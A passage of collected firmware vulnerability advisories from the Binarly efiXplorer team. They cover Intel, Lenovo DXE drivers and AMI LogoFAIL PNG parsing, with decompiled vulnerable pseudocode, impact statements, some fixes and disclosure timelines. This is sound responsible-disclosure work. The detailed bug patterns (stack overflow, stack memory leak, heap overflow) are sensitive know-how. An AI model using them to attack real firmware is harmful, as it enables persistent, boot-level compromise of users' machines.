| ``` 79 | 80 | Consider the following code snippet: 81 | 82 | ```c++ 83 | DataSize = 20; 84 | ... 85 | ... 86 | ... 87 | ... 88 | { 89 | ... 90 | if (gRT->GetVariable(L"Tpm12VersionInfo", &PEI_TCG_INTERNAL_FLAGS_GUID, &Attributes, &DataSize, Value) == EFI_SUCCESS) 91 | { 92 | ... 93 | } 94 | } 95 | Res = gRT->GetVariable(L"PCRBitmap", &PEI_TCG_INTERNAL_FLAGS_GUID, &Attributes, &DataSize, Value); 96 | ... 97 | ``` 98 | 99 | An attacker can change the values of the `Tpm12VersionInfo` and `PCRBitmap` variables. 100 | If the size of the value of the `Tpm12VersionInfo` variable is greater than 20, then after the first call to the `GetVariable` service, the `DataSize` variable will be overwritten (this means that the attacker is in control of the `DataSize` variable). 101 | The second call to `GetVariable` (for the `PCRBitmap` variable) can lead to a stack overflow and arbitrary code execution. 102 | 103 | ## Disclosure timeline 104 | 105 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 106 | 107 | | Disclosure Activity | Date (YYYY-MM-dd) | 108 | | ---------------------------------------- | ----------------- | 109 | | Intel PSIRT is notified | 2022-12-19 | 110 | | Intel PSIRT assigned CVE number | 2023-02-28 | 111 | | Intel PSIRT provide patch release | 2023-08-08 | 112 | | BINARLY public disclosure date | 2023-11-16 | 113 | 114 | ## Acknowledgements 115 | 116 | **BINARLY efiXplorer team** 117 | -------------------------------------------------------------------------------- /Lenovo/BRLY-2022-032.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-032] 2 | 3 | # The stack memory leak vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack memory leak vulnerability that allows a potential attacker to write stack memory to NVRAM variable. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-032 12 | * Lenovo PSIRT assigned CVE identifier: [CVE-2022-4432](https://support.lenovo.com/us/en/product_security/LEN-103709) 13 | * CVSS v3.1 Score 6.0 Medium AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET53W/$0AN3H00.FL1` | PersistenceConfigDxe | d4a34f30e64e7eea479bc55d9173eb91c9c4e6c8203b318a12877758e2a34f3b | 27A95D13-15FB-4A2E-91E2-C784BF0D20D3 | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to read the contents of the stack and use this information to exploit other vulnerabilities in DXE. A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 24 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerable function located at offet `0x2570` in the binary. 29 | The pseudocode of the vulnerable function is shown below: 30 | 31 | ```c 32 | __int64 __fastcall EventNotifier() 33 | { 34 | __int64 result; 35 | EFI_SET_VARIABLE SetVariable; 36 | EFI_GET_VARIABLE GetVariable; 37 | EFI_SET_VARIABLE SetVariable_1; 38 | __int64 DataSize; 39 | unsigned int Attributes; 40 | __int64 UnknownProtocolInterface; 41 | __int16 LenovoAbtStatusValue[7]; 42 | char LenovoSecurityConfig[139]; 43 | 44 | result = LocateProtocol(&gProtocolGuid, &gDataSegmentBase); 45 | if ( (result & 0x8000000000000000) == 0 ) 46 | { 47 | DataSize = 0x8B; 48 | result = (gRT->GetVariable)( 49 | L"LenovoSecurityConfig", 50 | &LENOVO_SECURITY_CONFIG_VARIABLE_GUID, 51 | &Attributes, 52 | &DataSize, 53 | LenovoSecurityConfig); 54 | if ( (result & 0x8000000000000000) == 0 ) 55 | { 56 | SetVariable = gRT->SetVariable; 57 | LenovoSecurityConfig[38] = 1; 58 | if ( ((SetVariable)( 59 | L"LenovoSecurityConfig", 60 | &LENOVO_SECURITY_CONFIG_VARIABLE_GUID, 61 | Attributes, 62 | DataSize, 63 | LenovoSecurityConfig) & 0x8000000000000000) == 0 ) 64 | (*(UnknownProtocolInterface + 0x10))(); // aa5978d6-4fba-4827-b776-9a11fc8cce4c 65 | GetVariable = gRT->GetVariable; 66 | DataSize = 14; 67 | if ( ((GetVariable)(L"LenovoAbtStatus", &unk_4030, &Attributes, &DataSize, LenovoAbtStatusValue) & 0x8000000000000000) != 0 ) 68 | { 69 | sub_28A8(LenovoAbtStatusValue, 14); 70 | LenovoAbtStatusValue[2] = 0x100; 71 | LenovoAbtStatusValue[0] = 1; 72 | sub_28A8(&LenovoAbtStatusValue[3], 7); 73 | } 74 | SetVariable_1 = gRT->SetVariable; 75 | LOBYTE(LenovoAbtStatusValue[2]) = 1; 76 | return (SetVariable_1)(L"LenovoAbtStatus", &unk_4030, Attributes, DataSize, LenovoAbtStatusValue); 77 | } 78 | } 79 | return result; 80 | } 81 | ``` 82 | 83 | As we can see from the pseudocode, for the `LenovoAbtStatus` variable `gRT->SetVariable()` service is called with the `DataSize` value, which can be overwritten inside the `gRT->GetVariable()` service. 84 | 85 | Thus, a potential attacker can write `X - 14` bytes from the stack to NVRAM if writes any buffer of length `X > 14` to the `LenovoAbtStatus` NVRAM variable. 86 | 87 | In order to fix this vulnerability, the `DataSize` variable must be initialized before `gRT->SetVariable()`. 88 | 89 | ## Disclosure timeline 90 | 91 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 92 | 93 | | Disclosure Activity | Date (YYYY-mm-dd) | 94 | | ---------------------------------------- | ----------------- | 95 | | Lenovo PSIRT is notified | 2022-10-24 | 96 | | Lenovo PSIRT confirmed reported issue | 2022-12-16 | 97 | | Lenovo PSIRT assigned CVE number | 2022-12-27 | 98 | | Lenovo PSIRT provide patch release | 2023-01-03 | 99 | | BINARLY public disclosure date | 2023-01-09 | 100 | 101 | ## Acknowledgements 102 | 103 | **BINARLY efiXplorer team** 104 | -------------------------------------------------------------------------------- /Lenovo/BRLY-2022-034.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-034] 2 | 3 | # Stack memory leak vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack memory leak vulnerability that allows a potential attacker to write stack memory to NVRAM variable. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-034 12 | * Lenovo PSIRT assigned CVE identifier: [CVE-2022-4433](https://support.lenovo.com/us/en/product_security/LEN-103709) 13 | * CVSS v3.1 Score 6.0 Medium AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET74W/$0AN3H00.FL1` | LenovoSetupConfigDxe | 388ec0a985921a5569240f1ee25b22a2a849fe6991fc80ad453d5cebe762a82e | 5FC8EEE0-9BF2-498F-B4D3-C51ED4C87BB4 | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to read the contents of the stack and use this information to exploit other vulnerabilities in DXE. A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 24 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | The pseudocode of the vulnerable function is shown below: 29 | 30 | ```c 31 | __int64 sub_2B80() 32 | { 33 | // starting at basic block 0x3418 34 | // ... 35 | GetVariable = gRT->GetVariable; 36 | DataSize = 49; 37 | GetVariable(L"LenovoFunctionConfig", &gVariableGuid, &v24, &DataSize, Value); 38 | Value[0] = 0; 39 | result = (gRT->SetVariable)(L"LenovoFunctionConfig", &gVariableGuid, v24, DataSize, Value); 40 | // ... 41 | } 42 | ``` 43 | 44 | As we can see from the pseudocode, the `gRT->SetVariable()` service is called with the `DataSize` value, which can be overwritten inside the `gRT->GetVariable()` service. 45 | 46 | Thus, a potential attacker can write `X - 49` bytes from the stack to NVRAM if writes any buffer of length `X > 49` to the `LenovoFunctionConfig` NVRAM variable. 47 | 48 | In order to fix this vulnerability, the `DataSize` variable must be initialized before `gRT->SetVariable()`: 49 | 50 | ```c 51 | // ... 52 | GetVariable = gRT->GetVariable; 53 | DataSize = 49; 54 | GetVariable(L"LenovoFunctionConfig", &gVariableGuid, &v24, &DataSize, Value); 55 | Value[0] = 0; 56 | DataSize = 49; // <--- added 57 | result = (gRT->SetVariable)(L"LenovoFunctionConfig", &gVariableGuid, v24, DataSize, Value); 58 | // ... 59 | ``` 60 | 61 | ## Disclosure timeline 62 | 63 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 64 | 65 | | Disclosure Activity | Date (YYYY-mm-dd) | 66 | | ---------------------------------------- | ----------------- | 67 | | Lenovo PSIRT is notified | 2022-10-24 | 68 | | Lenovo PSIRT confirmed reported issue | 2022-12-16 | 69 | | Lenovo PSIRT assigned CVE number | 2022-12-27 | 70 | | Lenovo PSIRT provide patch release | 2023-01-03 | 71 | | BINARLY public disclosure date | 2023-01-09 | 72 | 73 | ## Acknowledgements 74 | 75 | **BINARLY efiXplorer team** 76 | -------------------------------------------------------------------------------- /Lenovo/BRLY-2022-035.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-035] 2 | 3 | # Stack memory leak vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack memory leak vulnerability that allows a potential attacker to write stack memory to NVRAM variable. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-035 12 | * Lenovo PSIRT assigned CVE identifier: [CVE-2022-4434](https://support.lenovo.com/us/en/product_security/LEN-103709) 13 | * CVSS v3.1 Score 6.0 Medium AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET74W/$0AN3H00.FL1` | SystemErrorMenuDxe | b8ec9208998c62154c4ea1208c72609f56c770c11953b0c59466e752bbc562ca | BD6736AC-B126-4FEA-9D1D-174D4A899F22 | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to read the contents of the stack and use this information to exploit other vulnerabilities in DXE. A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 24 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | The pseudocode of the vulnerable function is shown below: 29 | 30 | ```c 31 | unsigned sub_2B18() 32 | { 33 | // ... 34 | DataSize = 8; 35 | if ( (gRT->GetVariable(L"PwdUnlockErr", &gVariableGuid, 0, &DataSize, Value) & 0x8000000000000000) != 0 ) 36 | v10 = 1; 37 | else 38 | v10 = *(v6 + 1); 39 | SetVariable = gRT->SetVariable; 40 | Value[0] = v10; 41 | SetVariable(L"PwdUnlockErr", &gVariableGuid, VARIABLE_ATTRIBUTE_NV_BS_RT, DataSize, Value); 42 | // ... 43 | } 44 | ``` 45 | 46 | As we can see from the pseudocode, the `gRT->SetVariable()` service is called with the `DataSize` value, which can be overwritten inside the `gRT->GetVariable()` service. 47 | 48 | Thus, a potential attacker can write `X - 8` bytes from the stack to NVRAM if writes any buffer of length `X > 8` to the `PwdUnlockErr` NVRAM variable. 49 | 50 | In order to fix this vulnerability, the `DataSize` variable must be initialized before `gRT->SetVariable()`: 51 | 52 | ```c 53 | // ... 54 | DataSize = 8; 55 | if ( (gRT->GetVariable(L"PwdUnlockErr", &gVariableGuid, 0, &DataSize, Value) & 0x8000000000000000) != 0 ) 56 | v10 = 1; 57 | else 58 | v10 = *(v6 + 1); 59 | SetVariable = gRT->SetVariable; 60 | Value[0] = v10; 61 | 62 | DataSize = 8; // <--- added 63 | SetVariable(L"PwdUnlockErr", &gVariableGuid, VARIABLE_ATTRIBUTE_NV_BS_RT, DataSize, Value); 64 | // ... 65 | ``` 66 | 67 | ## Disclosure timeline 68 | 69 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 70 | 71 | | Disclosure Activity | Date (YYYY-mm-dd) | 72 | | ---------------------------------------- | ----------------- | 73 | | Lenovo PSIRT is notified | 2022-10-24 | 74 | | Lenovo PSIRT confirmed reported issue | 2022-12-16 | 75 | | Lenovo PSIRT assigned CVE number | 2022-12-27 | 76 | | Lenovo PSIRT provide patch release | 2023-01-03 | 77 | | BINARLY public disclosure date | 2023-01-09 | 78 | 79 | ## Acknowledgements 80 | 81 | **BINARLY efiXplorer team** 82 | -------------------------------------------------------------------------------- /Lenovo/BRLY-2022-037.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2022-037] 2 | 3 | # The stack memory leak vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a stack memory leak vulnerability that allows a potential attacker to write stack memory to NVRAM variable. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2022-037 12 | * Lenovo PSIRT assigned CVE identifier: [CVE-2022-4435](https://support.lenovo.com/us/en/product_security/LEN-103709) 13 | * CVSS v3.1 Score 6.0 Medium AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N 14 | 15 | ## Affected Lenovo firmware with confirmed impact by Binarly team 16 | 17 | | Firmware | Module name | Module SHA256 | File GUID | 18 | | --- | --- | --- | --- | 19 | | `N3HET74W/$0AN3H00.FL1` | LenovoRemoteConfigUpdateDxe | 320762679cd89234f99927e94faa94aed1560c352046e4f85406e4838896fd07 | 621DE6C6-0F5E-4EE3-A102-0BDE769A0AD4 | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local privileged access can exploit this vulnerability to read the contents of the stack and use this information to exploit other vulnerabilities in DXE. A malicious code installed as a result of the vulnerability exploitation in a DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). 24 | Additionally, this vulnerability potentially could be used by threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on the OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services. 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerable functions is a part of protocol with GUID `d874d61a-4b87-7608-a00f-58add7052530`. 29 | The pseudocode of the vulnerable function is shown below: 30 | 31 | ```c 32 | __int64 sub_1D38() 33 | { 34 | // ... 35 | 36 | DataSize = 139; 37 | result = (gRT->GetVariable)(L"LenovoSecurityConfig", &LENOVO_SECURITY_CONFIG_VARIABLE_GUID, &DataSize, LenovoSecurityConfigValue); 38 | if ( (result & 0x8000000000000000) == 0 ) 39 | { 40 | if... 41 | if ( gLenovoRuntimeConfigFlag2 | gLenovoRuntimeConfigFlag1 ) 42 | { 43 | GetVariable = gRT->GetVariable; 44 | DataSize = 49; 45 | (GetVariable)(L"LenovoFunctionConfig", &gVariableGuid, &Attributes, &DataSize, LenovoFunctionConfigValue); 46 | LenovoFunctionConfigValue[0] = 0; 47 | (gRT->SetVariable)(L"LenovoFunctionConfig", &gVariableGuid, Attributes, DataSize, LenovoFunctionConfigValue); 48 | } 49 | return 0; 50 | } 51 | return result; 52 | } 53 | ``` 54 | 55 | As we can see from the pseudocode, for the `LenovoFunctionConfig` variable `gRT->SetVariable()` service is called with the `DataSize` value, which can be overwritten inside the `gRT->GetVariable()` service. 56 | 57 | Thus, a potential attacker can write `X - 49` bytes from the stack to NVRAM if writes any buffer of length `X > 49` to the `LenovoFunctionConfig` NVRAM variable. 58 | 59 | In order to fix this vulnerability, the `DataSize` variable must be initialized before `gRT->SetVariable()`. 60 | 61 | ## Disclosure timeline 62 | 63 | This vulnerability is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the vulnerability report will become visible to the public. 64 | 65 | | Disclosure Activity | Date (YYYY-mm-dd) | 66 | | ---------------------------------------- | ----------------- | 67 | | Lenovo PSIRT is notified | 2022-10-24 | 68 | | Lenovo PSIRT confirmed reported issue | 2022-12-16 | 69 | | Lenovo PSIRT assigned CVE number | 2022-12-27 | 70 | | Lenovo PSIRT provide patch release | 2023-01-03 | 71 | | BINARLY public disclosure date | 2023-01-09 | 72 | 73 | ## Acknowledgements 74 | 75 | **BINARLY efiXplorer team** 76 | -------------------------------------------------------------------------------- /LogoFAIL/BRLY-LOGOFAIL-2023-014.md: -------------------------------------------------------------------------------- 1 | # [BRLY-LOGOFAIL-2023-014] 2 | 3 | # Out-of-bounds Read in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a OOB Read vulnerability in DXE driver. Improper validation of PNG chunk length during PNG file processing in AMI firmware leads to OOB read. 8 | 9 | ## Vulnerability Information 10 | 11 | - BINARLY internal vulnerability identifier: BRLY-LOGOFAIL-2023-014 12 | - CVSS v3.1: 3.2 Low AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N 13 | 14 | ## Affected modules with confirmed impact by Binarly team 15 | 16 | | Module name | Module GUID | Module SHA256 | 17 | | ------------- | ------------------------------------ | ---------------------------------------------------------------- | 18 | | AMITSE | b1da0adf-4f77-4070-a88e-bffe1c60529a | 439e73d391b7f7540f6faa58afdc2722bda250468d4a4f7f5f84228c1f77ddbe | 19 | 20 | ## Potential impact 21 | 22 | This vulnerability will not lead to exploitation, however, it may lead to unexpected behaviour during PNG file processing. 23 | 24 | ## Vulnerability description 25 | 26 | The pseudocode of the vulnerable function is shown below: 27 | 28 | ```c 29 | unsigned __int8 *GetImageSize() 30 | { 31 | unsigned int ImageSize; // ebx 32 | unsigned __int8 *result; // rax 33 | __int64 ImagePtrCursor; // r9 34 | unsigned __int8 *v3; // rcx 35 | __int64 v4; // r10 36 | __int64 v5; // r9 37 | unsigned __int8 *v6; // rcx 38 | __int64 v7; // rdx 39 | unsigned int Length; // r11d 40 | unsigned __int8 *v9; // [rsp+30h] [rbp+8h] BYREF 41 | 42 | ImageSize = 8; 43 | GlobalImagePtr += 8i64; 44 | result = (unsigned __int8 *)AllocateZeroPool(4ui64); 45 | v9 = result; 46 | if ( result ) 47 | { 48 | ImagePtrCursor = GlobalImagePtr; 49 | do 50 | { 51 | v3 = result; 52 | v4 = 4i64; 53 | do 54 | { 55 | *v3 = v3[ImagePtrCursor - (_QWORD)result]; 56 | ++v3; 57 | --v4; 58 | } 59 | while ( v4 ); 60 | v5 = ImagePtrCursor + 4; 61 | v6 = result; 62 | v7 = 4i64; 63 | // BRLY-LOGOFAIL-2023-014: Chunk length is added without validation to ImagePtrCursor 64 | Length = result[3] + ((result[2] + ((result[1] + (*result << 8)) << 8)) << 8); 65 | do 66 | { 67 | *v6 = v6[v5 - (_QWORD)result]; 68 | ++v6; 69 | --v7; 70 | } 71 | while ( v7 ); 72 | ImageSize += Length + 12; 73 | ImagePtrCursor = Length + 8i64 + v5; 74 | } 75 | while ( result[3] + ((result[2] + ((result[1] + (*result << 8)) << 8)) << 8) != 1229278788 ); 76 | GlobalImagePtr = ImagePtrCursor; 77 | sub_4654(&v9); 78 | return (unsigned __int8 *)ImageSize; 79 | } 80 | return result; 81 | } 82 | ``` 83 | 84 | As we can see from the pseudocode, the variable `Length` is initialized from a value (`result`) which is read directly from the image buffer. 85 | `Length` is then used to update the `ImagePtrCursor` variable pointer without any validation. 86 | 87 | 88 | ## Disclosure timeline 89 | 90 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 91 | 92 | | Disclosure Activity | Date (YYYY-mm-dd) | 93 | | -------------------------------------- | ----------------- | 94 | | Lenovo PSIRT is notified | 2023-06-21 | 95 | | Lenovo ID (LEN-132940) is assigned | 2023-06-22 | 96 | | CERT/CC is notified | 2023-07-10 | 97 | | AMI PSIRT confirmed reported issues | 2023-10-05 | 98 | | AMI PSIRT assigned CVE ID | 2023-12-01 | 99 | | BINARLY public disclosure date | 2024-06-19 | 100 | 101 | ## Acknowledgements 102 | 103 | **BINARLY efiXplorer team** 104 | -------------------------------------------------------------------------------- /LogoFAIL/BRLY-LOGOFAIL-2023-015.md: -------------------------------------------------------------------------------- 1 | # [BRLY-LOGOFAIL-2023-015] 2 | 3 | # Out-of-bounds Read in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a OOB Read vulnerability in DXE driver. Improper validation of PNG chunk length during PNG file processing in AMI firmware leads to OOB read. 8 | 9 | ## Vulnerability Information 10 | 11 | - BINARLY internal vulnerability identifier: BRLY-LOGOFAIL-2023-015 12 | - CVSS v3.1: 3.2 Low AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N 13 | 14 | ## Affected modules with confirmed impact by Binarly team 15 | 16 | | Module name | Module GUID | Module SHA256 | 17 | | ------------- | ------------------------------------ | ---------------------------------------------------------------- | 18 | | AMITSE | b1da0adf-4f77-4070-a88e-bffe1c60529a | 439e73d391b7f7540f6faa58afdc2722bda250468d4a4f7f5f84228c1f77ddbe | 19 | 20 | ## Potential impact 21 | 22 | This vulnerability will not lead to exploitation, however, it may lead to unexpected behaviour during PNG file processing. 23 | 24 | ## Vulnerability description 25 | 26 | The pseudocode of the vulnerable function is shown below: 27 | 28 | ```c 29 | unsigned __int64 __fastcall GetChunk(_DWORD *Length, _QWORD *ChunkPtr, _DWORD *ChunkType, _DWORD *a4) 30 | { 31 | unsigned __int64 v5; // rbx 32 | unsigned __int8 *ZeroPool; // rax 33 | unsigned __int8 *v10; // rdi 34 | __int64 v11; // rdx 35 | unsigned __int8 *v12; // rcx 36 | __int64 v13; // r9 37 | __int64 v14; // r8 38 | __int64 v15; // rdx 39 | __int64 v16; // r8 40 | unsigned __int8 *v17; // rcx 41 | __int64 v18; // rdx 42 | int v19; // ecx 43 | UINTN Length1; // rcx 44 | _BYTE *v21; // rax 45 | __int64 v22; // r8 46 | __int64 v23; // r10 47 | __int64 v24; // r9 48 | __int64 v25; // rdx 49 | unsigned __int8 *v26; // rcx 50 | int v27; // ecx 51 | int v28; // eax 52 | unsigned __int8 *v30; // [rsp+20h] [rbp-28h] BYREF 53 | 54 | v5 = 0i64; 55 | ZeroPool = (unsigned __int8 *)AllocateZeroPool(4ui64); 56 | v30 = ZeroPool; 57 | v10 = ZeroPool; 58 | if ( ZeroPool ) 59 | { 60 | v11 = GlobalImagePtr; 61 | v12 = ZeroPool; 62 | v13 = 4i64; 63 | v14 = GlobalImagePtr - (_QWORD)ZeroPool; 64 | do 65 | { 66 | *v12 = v12[v14]; 67 | ++v12; 68 | --v13; 69 | } 70 | while ( v13 ); 71 | v15 = v11 + 4; 72 | v16 = 4i64; 73 | *Length = ZeroPool[3] + ((ZeroPool[2] + ((ZeroPool[1] + (*ZeroPool << 8)) << 8)) << 8); 74 | v17 = ZeroPool; 75 | do 76 | { 77 | *v17 = v17[v15 - (_QWORD)ZeroPool]; 78 | ++v17; 79 | --v16; 80 | } 81 | while ( v16 ); 82 | v18 = v15 + 4; 83 | v19 = ZeroPool[1] + (*ZeroPool << 8); 84 | GlobalImagePtr = v18; 85 | *ChunkType = ZeroPool[3] + ((ZeroPool[2] + (v19 << 8)) << 8); 86 | Length1 = (unsigned int)*Length; 87 | if ( (_DWORD)Length1 ) 88 | { 89 | v21 = AllocateZeroPool(Length1); 90 | *ChunkPtr = v21; 91 | if ( !v21 ) 92 | { 93 | v5 = 0x8000000000000009ui64; 94 | LABEL_18: 95 | sub_4654(&v30); 96 | return v5; 97 | } 98 | LODWORD(Length1) = *Length; 99 | v18 = GlobalImagePtr; 100 | if ( *Length ) 101 | { 102 | v22 = 0i64; 103 | v23 = (unsigned int)Length1; 104 | do 105 | { 106 | v21[v22] = *(_BYTE *)(v22 + v18); 107 | ++v22; 108 | --v23; 109 | } 110 | while ( v23 ); 111 | } 112 | } 113 | else 114 | { 115 | *ChunkPtr = 0i64; 116 | } 117 | v24 = 4i64; 118 | // BRLY-LOGOFAIL-2023-015: Length is read from chunk and added without validation to GlobalImagePtr (v25) 119 | v25 = (unsigned int)Length1 + v18; 120 | v26 = v10; 121 | do 122 | { 123 | *v26 = v26[v25 - (_QWORD)v10]; 124 | ++v26; 125 | --v24; 126 | } 127 | while ( v24 ); 128 | v27 = v10[2]; 129 | v28 = v10[1]; 130 | GlobalImagePtr = v25 + 4; 131 | *a4 = v10[3] + ((v27 + ((v28 + (*v10 << 8)) << 8)) << 8); 132 | goto LABEL_18; 133 | } 134 | return 0x8000000000000009ui64; 135 | } 136 | ``` 137 | 138 | As we can see from the pseudocode, a PNG chunk length (stored in the variable `Length1`) is used without validation to update the `GlobalImagePtr` variable pointer. 139 | 140 | ## Disclosure timeline 141 | 142 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 143 | 144 | | Disclosure Activity | Date (YYYY-mm-dd) | 145 | | -------------------------------------- | ----------------- | 146 | | Lenovo PSIRT is notified | 2023-06-21 | 147 | | Lenovo ID (LEN-132940) is assigned | 2023-06-22 | 148 | | CERT/CC is notified | 2023-07-10 | 149 | | AMI PSIRT confirmed reported issues | 2023-10-05 | 150 | | AMI PSIRT assigned CVE ID | 2023-12-01 | 151 | | BINARLY public disclosure date | 2024-06-19 | 152 | 153 | ## Acknowledgements 154 | 155 | **BINARLY efiXplorer team** 156 | -------------------------------------------------------------------------------- /LogoFAIL/BRLY-LOGOFAIL-2023-019.md: -------------------------------------------------------------------------------- 1 | # [BRLY-LOGOFAIL-2023-019] 2 | 3 | # Memory Corruption vulnerability in DXE driver. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered an integer overflow on memory allocation size that leads to OOB Write operations during PNG file processing in AMI firmware. 8 | 9 | ## Vulnerability Information 10 | 11 | - BINARLY internal vulnerability identifier: BRLY-LOGOFAIL-2023-019 12 | - AMI PSIRT assigned CVE identifier: CVE-2023-39538 13 | - CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 14 | 15 | ## Affected modules with confirmed impact by Binarly team 16 | 17 | | Module name | Module GUID | Module SHA256 | 18 | | ------------- | ------------------------------------ | ---------------------------------------------------------------- | 19 | | AMITSE | b1da0adf-4f77-4070-a88e-bffe1c60529a | 439e73d391b7f7540f6faa58afdc2722bda250468d4a4f7f5f84228c1f77ddbe | 20 | 21 | ## Potential impact 22 | 23 | An attacker with local access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to a DXE driver and execute arbitrary code. Malicious code installed as a result of this exploitation could survive operating system (OS) boot process and runtime, or modify NVRAM area on the SPI flash storage (to gain persistence). Additionally, threat actors could use this vulnerability to bypass OS security mechanisms (modify privileged memory or runtime variables), influence OS boot process, and in some cases allow an attacker to hook or modify EFI Runtime services. 24 | 25 | ## Vulnerability description 26 | 27 | The pseudocode of the vulnerable function is shown below: 28 | 29 | ```c 30 | unsigned __int64 __fastcall sub_33FE4( 31 | __int64 a1, 32 | unsigned int a2, 33 | _QWORD *a3, 34 | UINTN *a4, 35 | unsigned int *a5, 36 | unsigned int *a6) 37 | { 38 | __int64 v8; // rbx 39 | __int64 height; // rcx 40 | __int64 width; // rax 41 | UINTN size; // rcx 42 | _BYTE *ZeroPool; // rax MAPDST 43 | unsigned int i; // r8d 44 | unsigned int j; // r9d 45 | __int64 v16; // rdx 46 | _BYTE *v17; // rdx 47 | 48 | dword_973A0 = sub_186A0; 49 | dword_97330 = 0x7FFFFFFF; 50 | dword_97334 = 0x7FFFFFFF; 51 | dword_97338 = 0x7FFFFFFF; 52 | v8 = 0i64; 53 | if ( DecodePNG(a1, a2) ) 54 | return 0x8000000000000015ui64; 55 | height = Height; 56 | width = Width; 57 | *a5 = Height; 58 | *a6 = width; 59 | size = 4 * width * height; 60 | *a4 = size; 61 | ZeroPool = AllocateZeroPool(size); 62 | *a3 = ZeroPool; 63 | if ( !ZeroPool ) 64 | return 0x8000000000000009ui64; 65 | for ( i = 0; i < *a5; ++i ) 66 | { 67 | for ( j = 0; j < *a6; ZeroPool += 4 ) 68 | { 69 | if ( j >= Width ) 70 | v16 = 4 * Width * (i + 1) - 4; 71 | else 72 | v16 = 4 * (j + i * Width); 73 | v17 = (DecodedImg + v16); 74 | ++j; 75 | *ZeroPool = v17[2]; 76 | ZeroPool[1] = v17[1]; 77 | ZeroPool[2] = *v17; 78 | } 79 | } 80 | return v8; 81 | } 82 | ``` 83 | 84 | As we can see from the pseudocode, the `width` and `height` variables are not validated. The attacker can arbitrarly set these variables an thus trigger an integer overflow when `ZeroPool` is initialized from `EfiLibAllocateZeroPool((4 * width * height))`. Since `ZeroPool` is later used in this function to copy the uncompressed PNG image, the integer overflow forces the allocation of buffer that is too small to contain the intended data, thus creating an arbitrary heap overflow. 85 | 86 | ## Disclosure timeline 87 | 88 | This bug is subject to a 90 day disclosure deadline. 